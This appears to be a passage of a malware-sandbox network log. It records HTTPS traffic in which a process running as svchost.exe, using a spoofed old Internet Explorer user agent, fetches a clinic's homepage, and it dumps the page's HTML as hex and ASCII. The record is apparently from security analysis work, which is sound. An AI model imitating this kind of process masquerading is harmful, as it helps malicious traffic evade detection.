                                                                                                                                                                                                                                                                        2023-03-10 06:56:00 UTC121INData Raw: 20 6f 70 65 6e 45 66 66 65 63 74 09 3a 20 27 6e 6f 6e 65 27 2c 20 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 6f 70 65 6e 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 45 66 66 65 63 74 09 3a 20 27 6e 6f 6e 65 27 2c 20 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 09 09 09 09 61 75 74 6f 48 65 69 67 68 74 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 61 75 74 6f 57 69 64 74 68 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 77 69 64 74 68 20 20 20 20 20 3a 20 37 38 30 2c 0d 0a 09 09 6d 61 78 48 65 69 67 68 74 20 3a 20 38 30 30 2c 09 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: openEffect: 'none', //elastic, fade or none openSpeed : 250, closeEffect: 'none', //elastic, fade or none closeSpeed : 250, autoHeight : false,autoWidth : false,width : 780,maxHeight : 800,
                                                                                                                                                                                                                                                                        2023-03-10 06:56:00 UTC122INData Raw: 70 5f 61 68 6f 6c 69 63 27 29 3b 0d 0a 09 72 65 66 49 44 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 22 6e 6f 6e 65 22 3b 09 0d 0a 7d 0d 0a 66 75 6e 63 74 69 6f 6e 20 68 69 64 65 73 74 75 66 66 28 62 6f 78 69 64 29 7b 0d 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 6f 78 69 64 29 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 68 69 64 64 65 6e 22 3b 0d 0a 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 2d 61 68 6f 6c 69 63 33 37 39 22 20 68 72 65 66 3d 22 23 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 6c 69 6e 65 2d 61 75 74 6f
                                                                                                                                                                                                                                                                        Data Ascii: p_aholic');refID.style.display = "none";}function hidestuff(boxid){ document.getElementById(boxid).style.visibility="hidden";}</script><a class="popup-aholic379" href="#inline-auto379"></a><div style="display:none;"><div id="inline-auto
                                                                                                                                                                                                                                                                        2023-03-10 06:56:00 UTC124INData Raw: 73 69 7a 65 2d 31 30 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 65 64 20 67 2d 62 67 2d 34 20 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 69 6f 6e 2d 32 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 32 2e 70 6e 67 22 20 61 6c 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a
                                                                                                                                                                                                                                                                        Data Ascii: size-100 nopaddingall"><div class="g-content"><div class="moduletable "><div class="g-animatedblock "><div class="g-animatedblock-animated g-bg-4 g-animatedblock-animation-2"><img src="/images/rocketlauncher/home/slideshow/img-02.png" alt="image" />
                                                                                                                                                                                                                                                                        2023-03-10 06:56:00 UTC125INData Raw: 63 6b 20 68 69 64 64 65 6e 2d 70 68 6f 6e 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 75 73 74 6f 6d 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 68 69 64 64 65 6e 2d 70 68 6f 6e 65 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 34 2e 70 6e 67 22 20 61 6c 74 3d 22 53 61 6c 69 65 6e 74 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63
                                                                                                                                                                                                                                                                        Data Ascii: ck hidden-phone"><div class="customg-animatedblock hidden-phone"><img src="/images/rocketlauncher/home/slideshow/img-04.png" alt="Salient" /></div></div></div></div></div></div><div class="g-grid"><div class="g-block size-100 nopaddingall"><div c
                                                                                                                                                                                                                                                                        2023-03-10 06:56:00 UTC126INData Raw: 65 2d 69 63 6f 6e 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 64 65 73 63 22 3e 3c 61 20 63 6c 61 73 73 3d 22 70 6f 72 74 61 66 6f 6c 69 6f 5f 68 6f 6d 65 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 73 65 72 76 69 63 69 6f 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 22 3e 41 70 6f 79 6f 20 44 69 61 67 6e c3 b3 73 74 69 63 6f 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 66 69 67 75 72 65 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 32 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                                        Data Ascii: e-icon"></div><div class="g-promoimage-desc"><a class="portafolio_home" href="/index.php/somos-especialistas/servicio/apoyo-diagnostico">Apoyo Diagnstico</a></div> </div></figure></div> </div></div></div><div class="g-block size-20"><div class="
                                                                                                                                                                                                                                                                        2023-03-10 06:56:00 UTC128INData Raw: 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 20 63 65 6e 74 65 72 20 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 65 66 66 65 63 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 62 75 74 74 6f 6e 20 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 68 6f 6d 65 2f 63 61 6e 67 75 72 6f 2d 62 61 6a 61 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70
                                                                                                                                                                                                                                                                        Data Ascii: 0"><div class="g-content"><div class="moduletable "><div class="g-promoimage center g-promoimage-home"><figure class="g-promoimage-effect"><span class="g-promoimage-iconbutton "></span><img src="/images/home/canguro-baja.jpg" alt=""><div class="g-p
                                                                                                                                                                                                                                                                        2023-03-10 06:56:00 UTC129INData Raw: 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 66 65 61 74 75 72 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 2d 38 31 32 34 22 20 63 6c 61 73 73 3d 22 67 2d 77 72 61 70 70 65 72 22 3e 0a 3c 64 69
                                                                                                                                                                                                                                                                        Data Ascii: ></div></div></div></div></section><section id="g-feature"><div class="g-container"> <div class="g-grid"><div class="g-block size-100"><div class="spacer"></div></div></div></div></section><section id="g-container-8124" class="g-wrapper"><di
                                                                                                                                                                                                                                                                        2023-03-10 06:56:00 UTC130INData Raw: c3 b3 6e 20 31 20 63 69 74 61 20 64 65 20 6f 6e 63 6f 6c 6f 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 32 20 70 72 6f 67 72 61 6d 61 63 69 c3 b3 6e 20 64 65 20 63 69 72 75 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 33 20 6f 74 72 61 73 20 63 69 74 61 73 20 3c 62 72 3e 0a 48 6f 72 61 72 69 6f 20 64 65 20 61 74 65 6e 63 69 c3 b3 6e 3a 20 4c 75 6e 20 2d 20 56 69 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 35 3a 30 30 20 70 2e 6d 2e 20 6a 6f 72 6e 61 64 61 20 43 6f 6e 74 69 6e 75 61 2e 0a 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72 6f 6e 67 3e 43 69 74 61 73 20 50 72 6f 67 72 61 6d 61 20 43 61 6e 67 75 72 6f 3a 20 3c 70 3e 36 30 37 36 34 33 30 30 32 36 20 45 78 74 2e 33 36 31 2d 33 36 34 20 2d 20 3c 62 72 3e 20 3c 73 74 72 6f 6e 67 3e 48 6f 72 61 72
                                                                                                                                                                                                                                                                        Data Ascii: n 1 cita de oncologa- Opcin 2 programacin de ciruga- Opcin 3 otras citas <br>Horario de atencin: Lun - Vie 7:00 a.m. a 5:00 p.m. jornada Continua.</br><br></br><strong>Citas Programa Canguro: <p>6076430026 Ext.361-364 - <br> <strong>Horar
                                                                                                                                                                                                                                                                        2023-03-10 06:56:00 UTC132INData Raw: 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63
                                                                                                                                                                                                                                                                        Data Ascii: ><div class="g-contact-label">Calle 48 # 25-56</div> <div class="g-contact-text">Calle 48 # 25-56</div> </div><div class="g-contact-item"><div class="g-contact-label">Nuevo Sotomayor</div> <div class="g-contact-text">Nuevo Sotomayor</div> </div><div c
                                                                                                                                                                                                                                                                        2023-03-10 06:56:00 UTC133INData Raw: 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 20 73 69 7a 65 2d 33 33 2d 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6c 6f 67 6f 2d 32 34 34 34 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 3d 22 22 20 72 65 6c 3d 22 68 6f 6d 65 22 20 63 6c 61 73 73 3d 22 67 2d 66 6f 6f 74 65 72 2d 6c 6f 67 6f 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 32 30 32 31 2f 49 63 6f 6e 74 65 63 5f 4c 6f 67 6f 2e 6a 70 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20
                                                                                                                                                                                                                                                                        Data Ascii: v class="g-container"> <div class="g-grid"><div class="g-block size-33-3"><div id="logo-2444-particle" class="g-content g-particle"> <a href="/" title="" rel="home" class="g-footer-logo"><img src="/images/2021/Icontec_Logo.jpg" alt="Clinica San Luis"
                                                                                                                                                                                                                                                                        2023-03-10 06:56:00 UTC134INData Raw: 34 61 39 0d 0a 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 70 69 6e 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 74 3b 22 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 62 6f 74
                                                                                                                                                                                                                                                                        Data Ascii: 4a9sync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript" src="/media/gantry5/assets/js/main.js"></script><p class="pin"><span style="font-size: 10pt;"><div style="position: fixed; bot
                                                                                                                                                                                                                                                                        2023-03-10 06:56:00 UTC135INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        20192.168.2.653132104.21.66.220443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC306OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: clinicasanluis.com.co
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC440INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:15 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Set-Cookie: d55e479f054c94814cbc10d217aaa990=85e4e1a68595ff47778d80e98dbe0065; path=/; HttpOnly
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 10 Mar 2023 06:56:15 GMT
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9t0ITf82MDnzlhkfX%2BjMNVn4ZUTSaQw5gE9iukDLi3qlUC2IvV3g0IgmeFsCgycTBByidW2RKu%2BZE17cIppGrXimeHr%2FXMVo9XvC3VaNpDurmPyPUTVAT2y14pQrLJ6TrhxiomiP%2FMg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a81c6e669a24-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC441INData Raw: 37 63 34 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20
                                                                                                                                                                                                                                                                        Data Ascii: 7c4e<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/"
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC441INData Raw: 20 68 72 65 66 3d 22 2f 70 6c 75 67 69 6e 73 2f 73 79 73 74 65 6d 2f 72 6f 6b 62 6f 78 2f 61 73 73 65 74 73 2f 73 74 79 6c 65 73 2f 72 6f 6b 62 6f 78 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 6f 64 75 6c 65 73 2f 6d 6f 64 5f 70 6f 70 75 70 61 68 6f 6c 69 63 2f 63 73 73 2f 6a 71 75 65 72 79 2e 67 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d
                                                                                                                                                                                                                                                                        Data Ascii: href="/plugins/system/rokbox/assets/styles/rokbox.css" rel="stylesheet" /><link href="/modules/mod_popupaholic/css/jquery.gafancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><link href=
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC443INData Raw: 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 6d 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69
                                                                                                                                                                                                                                                                        Data Ascii: media/system/js/core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-more.js?989da4646a1a0dfff9a5685fb6ee36da"></script><scri
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC444INData Raw: 2f 6a 73 2f 68 74 6d 6c 35 73 68 69 76 2d 70 72 69 6e 74 73 68 69 76 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2f 6e 75 63 6c 65 75 73 2d 69 65 39 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 74 63 68 6d 65 64 69 61 2e 70 6f 6c 79 66 69 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20
                                                                                                                                                                                                                                                                        Data Ascii: /js/html5shiv-printshiv.min.js"></script> <link rel="stylesheet" href="/media/gantry5/users/nucleus/css/nucleus-ie9.css" type="text/css"/> <script type="text/javascript" src="/media/gantry5/assets/js/matchmedia.polyfill.js"></script>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC445INData Raw: 61 5f 63 6c 69 6e 69 63 61 2f 6c 6f 67 6f 5f 68 6f 72 69 7a 6f 6e 74 61 6c 2e 70 6e 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 36 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 65 6e 75 2d 38 36 30 35 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 67 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 67 2d 68 6f 76 65 72 2d 65 78 70 61 6e 64 3d 22 74 72 75 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 74 6f 70 6c 65 76 65
                                                                                                                                                                                                                                                                        Data Ascii: a_clinica/logo_horizontal.png" alt="Clinica San Luis" /></a></div></div><div class="g-block size-63"><div id="menu-8605-particle" class="g-content g-particle"> <nav class="g-main-nav" role="navigation" data-g-hover-expand="true"><ul class="g-topleve
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC447INData Raw: 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 23 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 73 70 61 6e 3e 42 61 63 6b 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                                        Data Ascii: u-item-container" href="#" data-g-menuparent=""><span>Back</span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-215 "><a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"> <span class=
